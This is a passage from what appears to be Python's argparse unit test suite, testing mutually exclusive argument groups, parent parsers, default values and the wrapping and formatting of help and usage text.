parser.add_argument('--fghij', help='fghij help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--klmno', help='klmno help')
group.add_argument('--pqrst', help='pqrst help')
return parser
failures = ['--klmno X --pqrst Y']
successes = [
('--klmno X', NS(abcde=None, fghij=None, klmno='X', pqrst=None)),
('--abcde Y --klmno X',
NS(abcde='Y', fghij=None, klmno='X', pqrst=None)),
('--pqrst X', NS(abcde=None, fghij=None, klmno=None, pqrst='X')),
('--pqrst X --fghij Y',
NS(abcde=None, fghij='Y', klmno=None, pqrst='X')),
]
successes_when_not_required = [
('', NS(abcde=None, fghij=None, klmno=None, pqrst=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--abcde ABCDE] [--fghij FGHIJ]
[--klmno KLMNO | --pqrst PQRST]
'''
usage_when_required = '''\
usage: PROG [-h] [--abcde ABCDE] [--fghij FGHIJ]
(--klmno KLMNO | --pqrst PQRST)
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
--abcde ABCDE abcde help
--fghij FGHIJ fghij help
--klmno KLMNO klmno help
--pqrst PQRST pqrst help
'''
class TestMutuallyExclusiveFirstSuppressed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('-x', help=argparse.SUPPRESS)
group.add_argument('-y', action='store_false', help='y help')
return parser
failures = ['-x X -y']
successes = [
('-x X', NS(x='X', y=True)),
('-x X -x Y', NS(x='Y', y=True)),
('-y', NS(x=None, y=False)),
]
successes_when_not_required = [
('', NS(x=None, y=True)),
]
usage_when_not_required = '''\
usage: PROG [-h] [-y]
'''
usage_when_required = '''\
usage: PROG [-h] -y
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
-y y help
'''
class TestMutuallyExclusiveManySuppressed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
add = group.add_argument
add('--spam', action='store_true', help=argparse.SUPPRESS)
add('--badger', action='store_false', help=argparse.SUPPRESS)
add('--bladder', help=argparse.SUPPRESS)
return parser
failures = [
'--spam --badger',
'--badger --bladder B',
'--bladder B --spam',
]
successes = [
('--spam', NS(spam=True, badger=True, bladder=None)),
('--badger', NS(spam=False, badger=False, bladder=None)),
('--bladder B', NS(spam=False, badger=True, bladder='B')),
('--spam --spam', NS(spam=True, badger=True, bladder=None)),
]
successes_when_not_required = [
('', NS(spam=False, badger=True, bladder=None)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h]
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
'''
class TestMutuallyExclusiveOptionalAndPositional(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--foo', action='store_true', help='FOO')
group.add_argument('--spam', help='SPAM')
group.add_argument('badger', nargs='*', default='X', help='BADGER')
return parser
failures = [
'--foo --spam S',
'--spam S X',
'X --foo',
'X Y Z --spam S',
'--foo X Y',
]
successes = [
('--foo', NS(foo=True, spam=None, badger='X')),
('--spam S', NS(foo=False, spam='S', badger='X')),
('X', NS(foo=False, spam=None, badger=['X'])),
('X Y Z', NS(foo=False, spam=None, badger=['X', 'Y', 'Z'])),
]
successes_when_not_required = [
('', NS(foo=False, spam=None, badger='X')),
]
usage_when_not_required = '''\
usage: PROG [-h] [--foo | --spam SPAM | badger [badger ...]]
'''
usage_when_required = '''\
usage: PROG [-h] (--foo | --spam SPAM | badger [badger ...])
'''
help = '''\
positional arguments:
badger BADGER
optional arguments:
-h, --help show this help message and exit
--foo FOO
--spam SPAM SPAM
'''
class TestMutuallyExclusiveOptionalsMixed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('-x', action='store_true', help='x help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('-a', action='store_true', help='a help')
group.add_argument('-b', action='store_true', help='b help')
parser.add_argument('-y', action='store_true', help='y help')
group.add_argument('-c', action='store_true', help='c help')
return parser
failures = ['-a -b', '-b -c', '-a -c', '-a -b -c']
successes = [
('-a', NS(a=True, b=False, c=False, x=False, y=False)),
('-b', NS(a=False, b=True, c=False, x=False, y=False)),
('-c', NS(a=False, b=False, c=True, x=False, y=False)),
('-a -x', NS(a=True, b=False, c=False, x=True, y=False)),
('-y -b', NS(a=False, b=True, c=False, x=False, y=True)),
('-x -y -c', NS(a=False, b=False, c=True, x=True, y=True)),
]
successes_when_not_required = [
('', NS(a=False, b=False, c=False, x=False, y=False)),
('-x', NS(a=False, b=False, c=False, x=True, y=False)),
('-y', NS(a=False, b=False, c=False, x=False, y=True)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h] [-x] [-a] [-b] [-y] [-c]
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
-x x help
-a a help
-b b help
-y y help
-c c help
'''
class TestMutuallyExclusiveInGroup(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
titled_group = parser.add_argument_group(
title='Titled group', description='Group description')
mutex_group = \
titled_group.add_mutually_exclusive_group(required=required)
mutex_group.add_argument('--bar', help='bar help')
mutex_group.add_argument('--baz', help='baz help')
return parser
failures = ['--bar X --baz Y', '--baz X --bar Y']
successes = [
('--bar X', NS(bar='X', baz=None)),
('--baz Y', NS(bar=None, baz='Y')),
]
successes_when_not_required = [
('', NS(bar=None, baz=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--bar BAR | --baz BAZ]
'''
usage_when_required = '''\
usage: PROG [-h] (--bar BAR | --baz BAZ)
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
Titled group:
Group description
--bar BAR bar help
--baz BAZ baz help
'''
class TestMutuallyExclusiveOptionalsAndPositionalsMixed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('x', help='x help')
parser.add_argument('-y', action='store_true', help='y help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('a', nargs='?', help='a help')
group.add_argument('-b', action='store_true', help='b help')
group.add_argument('-c', action='store_true', help='c help')
return parser
failures = ['X A -b', '-b -c', '-c X A']
successes = [
('X A', NS(a='A', b=False, c=False, x='X', y=False)),
('X -b', NS(a=None, b=True, c=False, x='X', y=False)),
('X -c', NS(a=None, b=False, c=True, x='X', y=False)),
('X A -y', NS(a='A', b=False, c=False, x='X', y=True)),
('X -y -b', NS(a=None, b=True, c=False, x='X', y=True)),
]
successes_when_not_required = [
('X', NS(a=None, b=False, c=False, x='X', y=False)),
('X -y', NS(a=None, b=False, c=False, x='X', y=True)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h] [-y] [-b] [-c] x [a]
'''
help = '''\
positional arguments:
x x help
a a help
optional arguments:
-h, --help show this help message and exit
-y y help
-b b help
-c c help
'''
# =================================================
# Mutually exclusive group in parent parser tests
# =================================================
class MEPBase(object):
def get_parser(self, required=None):
parent = super(MEPBase, self).get_parser(required=required)
parser = ErrorRaisingArgumentParser(
prog=parent.prog, add_help=False, parents=[parent])
return parser
class TestMutuallyExclusiveGroupErrorsParent(
MEPBase, TestMutuallyExclusiveGroupErrors):
pass
class TestMutuallyExclusiveSimpleParent(
MEPBase, TestMutuallyExclusiveSimple):
pass
class TestMutuallyExclusiveLongParent(
MEPBase, TestMutuallyExclusiveLong):
pass
class TestMutuallyExclusiveFirstSuppressedParent(
MEPBase, TestMutuallyExclusiveFirstSuppressed):
pass
class TestMutuallyExclusiveManySuppressedParent(
MEPBase, TestMutuallyExclusiveManySuppressed):
pass
class TestMutuallyExclusiveOptionalAndPositionalParent(
MEPBase, TestMutuallyExclusiveOptionalAndPositional):
pass
class TestMutuallyExclusiveOptionalsMixedParent(
MEPBase, TestMutuallyExclusiveOptionalsMixed):
pass
class TestMutuallyExclusiveOptionalsAndPositionalsMixedParent(
MEPBase, TestMutuallyExclusiveOptionalsAndPositionalsMixed):
pass
# =================
# Set default tests
# =================
class TestSetDefaults(TestCase):
def test_set_defaults_no_args(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo')
parser.set_defaults(y='bar', z=1)
self.assertEqual(NS(x='foo', y='bar', z=1),
parser.parse_args([]))
self.assertEqual(NS(x='foo', y='bar', z=1),
parser.parse_args([], NS()))
self.assertEqual(NS(x='baz', y='bar', z=1),
parser.parse_args([], NS(x='baz')))
self.assertEqual(NS(x='baz', y='bar', z=2),
parser.parse_args([], NS(x='baz', z=2)))
def test_set_defaults_with_args(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo', y='bar')
parser.add_argument('-x', default='xfoox')
self.assertEqual(NS(x='xfoox', y='bar'),
parser.parse_args([]))
self.assertEqual(NS(x='xfoox', y='bar'),
parser.parse_args([], NS()))
self.assertEqual(NS(x='baz', y='bar'),
parser.parse_args([], NS(x='baz')))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split()))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split(), NS()))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split(), NS(x='baz')))
def test_set_defaults_subparsers(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo')
subparsers = parser.add_subparsers()
parser_a = subparsers.add_parser('a')
parser_a.set_defaults(y='bar')
self.assertEqual(NS(x='foo', y='bar'),
parser.parse_args('a'.split()))
def test_set_defaults_parents(self):
parent = ErrorRaisingArgumentParser(add_help=False)
parent.set_defaults(x='foo')
parser = ErrorRaisingArgumentParser(parents=[parent])
self.assertEqual(NS(x='foo'), parser.parse_args([]))
def test_set_defaults_same_as_add_argument(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(w='W', x='X', y='Y', z='Z')
parser.add_argument('-w')
parser.add_argument('-x', default='XX')
parser.add_argument('y', nargs='?')
parser.add_argument('z', nargs='?', default='ZZ')
# defaults set previously
self.assertEqual(NS(w='W', x='XX', y='Y', z='ZZ'),
parser.parse_args([]))
# reset defaults
parser.set_defaults(w='WW', x='X', y='YY', z='Z')
self.assertEqual(NS(w='WW', x='X', y='YY', z='Z'),
parser.parse_args([]))
def test_set_defaults_same_as_add_argument_group(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(w='W', x='X', y='Y', z='Z')
group = parser.add_argument_group('foo')
group.add_argument('-w')
group.add_argument('-x', default='XX')
group.add_argument('y', nargs='?')
group.add_argument('z', nargs='?', default='ZZ')
# defaults set previously
self.assertEqual(NS(w='W', x='XX', y='Y', z='ZZ'),
parser.parse_args([]))
# reset defaults
parser.set_defaults(w='WW', x='X', y='YY', z='Z')
self.assertEqual(NS(w='WW', x='X', y='YY', z='Z'),
parser.parse_args([]))
# =================
# Get default tests
# =================
class TestGetDefault(TestCase):
def test_get_default(self):
parser = ErrorRaisingArgumentParser()
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(None, parser.get_default("bar"))
parser.add_argument("--foo")
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(None, parser.get_default("bar"))
parser.add_argument("--bar", type=int, default=42)
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(42, parser.get_default("bar"))
parser.set_defaults(foo="badger")
self.assertEqual("badger", parser.get_default("foo"))
self.assertEqual(42, parser.get_default("bar"))
# ==========================
# Namespace 'contains' tests
# ==========================
class TestNamespaceContainsSimple(TestCase):
def test_empty(self):
ns = argparse.Namespace()
self.assertEqual('' in ns, False)
self.assertEqual('' not in ns, True)
self.assertEqual('x' in ns, False)
def test_non_empty(self):
ns = argparse.Namespace(x=1, y=2)
self.assertEqual('x' in ns, True)
self.assertEqual('x' not in ns, False)
self.assertEqual('y' in ns, True)
self.assertEqual('' in ns, False)
self.assertEqual('xx' in ns, False)
self.assertEqual('z' in ns, False)
# =====================
# Help formatting tests
# =====================
class TestHelpFormattingMetaclass(type):
def __init__(cls, name, bases, bodydict):
if name == 'HelpTestCase':
return
class AddTests(object):
def __init__(self, test_class, func_suffix, std_name):
self.func_suffix = func_suffix
self.std_name = std_name
for test_func in [self.test_format,
self.test_print,
self.test_print_file]:
test_name = '%s_%s' % (test_func.__name__, func_suffix)
def test_wrapper(self, test_func=test_func):
test_func(self)
try:
test_wrapper.__name__ = test_name
except TypeError:
pass
setattr(test_class, test_name, test_wrapper)
def _get_parser(self, tester):
parser = argparse.ArgumentParser(
*tester.parser_signature.args,
**tester.parser_signature.kwargs)
for argument_sig in getattr(tester, 'argument_signatures', []):
parser.add_argument(*argument_sig.args,
**argument_sig.kwargs)
group_sigs = getattr(tester, 'argument_group_signatures', [])
for group_sig, argument_sigs in group_sigs:
group = parser.add_argument_group(*group_sig.args,
**group_sig.kwargs)
for argument_sig in argument_sigs:
group.add_argument(*argument_sig.args,
**argument_sig.kwargs)
subparsers_sigs = getattr(tester, 'subparsers_signatures', [])
if subparsers_sigs:
subparsers = parser.add_subparsers()
for subparser_sig in subparsers_sigs:
subparsers.add_parser(*subparser_sig.args,
**subparser_sig.kwargs)
return parser
def _test(self, tester, parser_text):
expected_text = getattr(tester, self.func_suffix)
expected_text = textwrap.dedent(expected_text)
if expected_text != parser_text:
print(repr(expected_text))
print(repr(parser_text))
for char1, char2 in zip(expected_text, parser_text):
if char1 != char2:
print('first diff: %r %r' % (char1, char2))
break
tester.assertEqual(expected_text, parser_text)
def test_format(self, tester):
parser = self._get_parser(tester)
format = getattr(parser, 'format_%s' % self.func_suffix)
self._test(tester, format())
def test_print(self, tester):
parser = self._get_parser(tester)
print_ = getattr(parser, 'print_%s' % self.func_suffix)
old_stream = getattr(sys, self.std_name)
setattr(sys, self.std_name, StdIOBuffer())
try:
print_()
parser_text = getattr(sys, self.std_name).getvalue()
finally:
setattr(sys, self.std_name, old_stream)
self._test(tester, parser_text)
def test_print_file(self, tester):
parser = self._get_parser(tester)
print_ = getattr(parser, 'print_%s' % self.func_suffix)
sfile = StdIOBuffer()
print_(sfile)
parser_text = sfile.getvalue()
self._test(tester, parser_text)
# add tests for {format,print}_{usage,help,version}
for func_suffix, std_name in [('usage', 'stdout'),
('help', 'stdout'),
('version', 'stderr')]:
AddTests(cls, func_suffix, std_name)
bases = TestCase,
HelpTestCase = TestHelpFormattingMetaclass('HelpTestCase', bases, {})
class TestHelpBiggerOptionals(HelpTestCase):
"""Make sure that argument help aligns when options are longer"""
parser_signature = Sig(prog='PROG', description='DESCRIPTION',
epilog='EPILOG', version='0.1')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('foo', help='FOO HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-v] [-x] [--y Y] foo bar
'''
help = usage + '''\
DESCRIPTION
positional arguments:
foo FOO HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x X HELP
--y Y Y HELP
EPILOG
'''
version = '''\
0.1
'''
class TestHelpBiggerOptionalGroups(HelpTestCase):
"""Make sure that argument help aligns when options are longer"""
parser_signature = Sig(prog='PROG', description='DESCRIPTION',
epilog='EPILOG', version='0.1')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('foo', help='FOO HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = [
(Sig('GROUP TITLE', description='GROUP DESCRIPTION'), [
Sig('baz', help='BAZ HELP'),
Sig('-z', nargs='+', help='Z HELP')]),
]
usage = '''\
usage: PROG [-h] [-v] [-x] [--y Y] [-z Z [Z ...]] foo bar baz
'''
help = usage + '''\
DESCRIPTION
positional arguments:
foo FOO HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x X HELP
--y Y Y HELP
GROUP TITLE:
GROUP DESCRIPTION
baz BAZ HELP
-z Z [Z ...] Z HELP
EPILOG
'''
version = '''\
0.1
'''
class TestHelpBiggerPositionals(HelpTestCase):
"""Make sure that help aligns when arguments are longer"""
parser_signature = Sig(usage='USAGE', description='DESCRIPTION')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('ekiekiekifekang', help='EKI HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = []
usage = '''\
usage: USAGE
'''
help = usage + '''\
DESCRIPTION
positional arguments:
ekiekiekifekang EKI HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-x X HELP
--y Y Y HELP
'''
version = ''
class TestHelpReformatting(HelpTestCase):
"""Make sure that text after short names starts on the first line"""
parser_signature = Sig(
prog='PROG',
description=' oddly formatted\n'
'description\n'
'\n'
'that is so long that it should go onto multiple '
'lines when wrapped')
argument_signatures = [
Sig('-x', metavar='XX', help='oddly\n'
' formatted -x help'),
Sig('y', metavar='yyy', help='normal y help'),
]
argument_group_signatures = [
(Sig('title', description='\n'
' oddly formatted group\n'
'\n'
'description'),
[Sig('-a', action='store_true',
help=' oddly \n'
'formatted -a help \n'
' again, so long that it should be wrapped over '
'multiple lines')]),
]
usage = '''\
usage: PROG [-h] [-x XX] [-a] yyy
'''
help = usage + '''\
oddly formatted description that is so long that it should go onto \
multiple
lines when wrapped
positional arguments:
yyy normal y help
optional arguments:
-h, --help show this help message and exit
-x XX oddly formatted -x help
title:
oddly formatted group description
-a oddly formatted -a help again, so long that it should \
be wrapped
over multiple lines
'''
version = ''
class TestHelpWrappingShortNames(HelpTestCase):
"""Make sure that text after short names starts on the first line"""
parser_signature = Sig(prog='PROG', description= 'D\nD' * 30)
argument_signatures = [
Sig('-x', metavar='XX', help='XHH HX' * 20),
Sig('y', metavar='yyy', help='YH YH' * 20),
]
argument_group_signatures = [
(Sig('ALPHAS'), [
Sig('-a', action='store_true', help='AHHH HHA' * 10)]),
]
usage = '''\
usage: PROG [-h] [-x XX] [-a] yyy
'''
help = usage + '''\
D DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD \
DD DD DD
DD DD DD DD D
positional arguments:
yyy YH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH \
YHYH YHYH
YHYH YHYH YHYH YHYH YHYH YHYH YHYH YH
optional arguments:
-h, --help show this help message and exit
-x XX XHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH \
HXXHH HXXHH
HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HX
ALPHAS:
-a AHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH \
HHAAHHH
HHAAHHH HHAAHHH HHA
'''
version = ''
class TestHelpWrappingLongNames(HelpTestCase):
"""Make sure that text after long names starts on the next line"""
parser_signature = Sig(usage='USAGE', description= 'D D' * 30,
version='V V'*30)
argument_signatures = [
Sig('-x', metavar='X' * 25, help='XH XH' * 20),
Sig('y', metavar='y' * 25, help='YH YH' * 20),
]
argument_group_signatures = [
(Sig('ALPHAS'), [
Sig('-a', metavar='A' * 25, help='AH AH' * 20),
Sig('z', metavar='z' * 25, help='ZH ZH' * 20)]),
]
usage = '''\
usage: USAGE
'''
help = usage + '''\
D DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD \
DD DD DD
DD DD DD DD D
positional arguments:
yyyyyyyyyyyyyyyyyyyyyyyyy
YH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH \
YHYH YHYH
YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YH
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
XH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH \
XHXH XHXH
XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XH
ALPHAS:
-a AAAAAAAAAAAAAAAAAAAAAAAAA
AH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH \
AHAH AHAH
AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AH
zzzzzzzzzzzzzzzzzzzzzzzzz
ZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH \
ZHZH ZHZH
ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZH
'''
version = '''\
V VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV \
VV VV VV
VV VV VV VV V
'''
class TestHelpUsage(HelpTestCase):
"""Test basic usage messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', nargs='+', help='w'),
Sig('-x', nargs='*', help='x'),
Sig('a', help='a'),
Sig('b', help='b', nargs=2),
Sig('c', help='c', nargs='?'),
]
argument_group_signatures = [
(Sig('group'), [
Sig('-y', nargs='?', help='y'),
Sig('-z', nargs=3, help='z'),
Sig('d', help='d', nargs='*'),
Sig('e', help='e', nargs='+'),
])
]
usage = '''\
usage: PROG [-h] [-w W [W ...]] [-x [X [X ...]]] [-y [Y]] [-z Z Z Z]
a b b [c] [d [d ...]] e [e ...]
'''
help = usage + '''\
positional arguments:
a a
b b
c c
optional arguments:
-h, --help show this help message and exit
-w W [W ...] w
-x [X [X ...]] x
group:
-y [Y] y
-z Z Z Z z
d d
e e
'''
version = ''
class TestHelpOnlyUserGroups(HelpTestCase):
"""Test basic usage messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = []
argument_group_signatures = [
(Sig('xxxx'), [
Sig('-x', help='x'),
Sig('a', help='a'),
]),
(Sig('yyyy'), [
Sig('b', help='b'),
Sig('-y', help='y'),
]),
]
usage = '''\
usage: PROG [-x X] [-y Y] a b
'''
help = usage + '''\
xxxx:
-x X x
a a
yyyy:
b b
-y Y y
'''
version = ''
class TestHelpUsageLongProg(HelpTestCase):
"""Test usage messages where the prog is long"""
parser_signature = Sig(prog='P' * 60)
argument_signatures = [
Sig('-w', metavar='W'),
Sig('-x', metavar='X'),
Sig('a'),
Sig('b'),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
[-h] [-w W] [-x X] a b
'''
help = usage + '''\
positional arguments:
a
b
optional arguments:
-h, --help show this help message and exit
-w W
-x X
'''
version = ''
class TestHelpUsageLongProgOptionsWrap(HelpTestCase):
"""Test usage messages where the prog is long and the optionals wrap"""
parser_signature = Sig(prog='P' * 60)
argument_signatures = [
Sig('-w', metavar='W' * 25),
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a'),
Sig('b'),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
[-h] [-w WWWWWWWWWWWWWWWWWWWWWWWWW] \
[-x XXXXXXXXXXXXXXXXXXXXXXXXX]
[-y YYYYYYYYYYYYYYYYYYYYYYYYY] [-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
a b
'''
help = usage + '''\
positional arguments:
a
b
optional arguments:
-h, --help show this help message and exit
-w WWWWWWWWWWWWWWWWWWWWWWWWW
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsageLongProgPositionalsWrap(HelpTestCase):
"""Test usage messages where the prog is long and the positionals wrap"""
parser_signature = Sig(prog='P' * 60, add_help=False)
argument_signatures = [
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
version = ''
class TestHelpUsageOptionalsWrap(HelpTestCase):
"""Test usage messages where the optionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', metavar='W' * 25),
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a'),
Sig('b'),
Sig('c'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-w WWWWWWWWWWWWWWWWWWWWWWWWW] \
[-x XXXXXXXXXXXXXXXXXXXXXXXXX]
[-y YYYYYYYYYYYYYYYYYYYYYYYYY] \
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
a b c
'''
help = usage + '''\
positional arguments:
a
b
c
optional arguments:
-h, --help show this help message and exit
-w WWWWWWWWWWWWWWWWWWWWWWWWW
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsagePositionalsWrap(HelpTestCase):
"""Test usage messages where the positionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x'),
Sig('-y'),
Sig('-z'),
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x X] [-y Y] [-z Z]
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
optional arguments:
-h, --help show this help message and exit
-x X
-y Y
-z Z
'''
version = ''
class TestHelpUsageOptionalsPositionalsWrap(HelpTestCase):
"""Test usage messages where the optionals and positionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x XXXXXXXXXXXXXXXXXXXXXXXXX] \
[-y YYYYYYYYYYYYYYYYYYYYYYYYY]
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
optional arguments:
-h, --help show this help message and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsageOptionalsOnlyWrap(HelpTestCase):
"""Test usage messages where there are only optionals and they wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x XXXXXXXXXXXXXXXXXXXXXXXXX] \
[-y YYYYYYYYYYYYYYYYYYYYYYYYY]
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsagePositionalsOnlyWrap(HelpTestCase):
"""Test usage messages where there are only positionals and they wrap"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
version = ''
class TestHelpVariableExpansion(HelpTestCase):
"""Test that variables are expanded properly in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', type=int,
help='x %(prog)s %(default)s %(type)s %%'),
Sig('-y', action='store_const', default=42, const='XXX',
help='y %(prog)s %(default)s %(const)s'),
Sig('--foo', choices='abc',
help='foo %(prog)s %(default)s %(choices)s'),
Sig('--bar', default='baz', choices=[1, 2], metavar='BBB',
help='bar %(prog)s %(default)s %(dest)s'),
Sig('spam', help='spam %(prog)s %(default)s'),
Sig('badger', default=0.5, help='badger %(prog)s %(default)s'),
]
argument_group_signatures = [
(Sig('group'), [
Sig('-a', help='a %(prog)s %(default)s'),
Sig('-b', default=-1, help='b %(prog)s %(default)s'),
])
]
usage = ('''\
usage: PROG [-h] [-x X] [-y] [--foo {a,b,c}] [--bar BBB] [-a A] [-b B]
spam badger
''')
help = usage + '''\
positional arguments:
spam spam PROG None
badger badger PROG 0.5
optional arguments:
-h, --help show this help message and exit
-x X x PROG None int %
-y y PROG 42 XXX
--foo {a,b,c} foo PROG None a, b, c
--bar BBB bar PROG baz bar
group:
-a A a PROG None
-b B b PROG -1
'''
version = ''
class TestHelpVariableExpansionUsageSupplied(HelpTestCase):
"""Test that variables are expanded properly when usage= is present"""
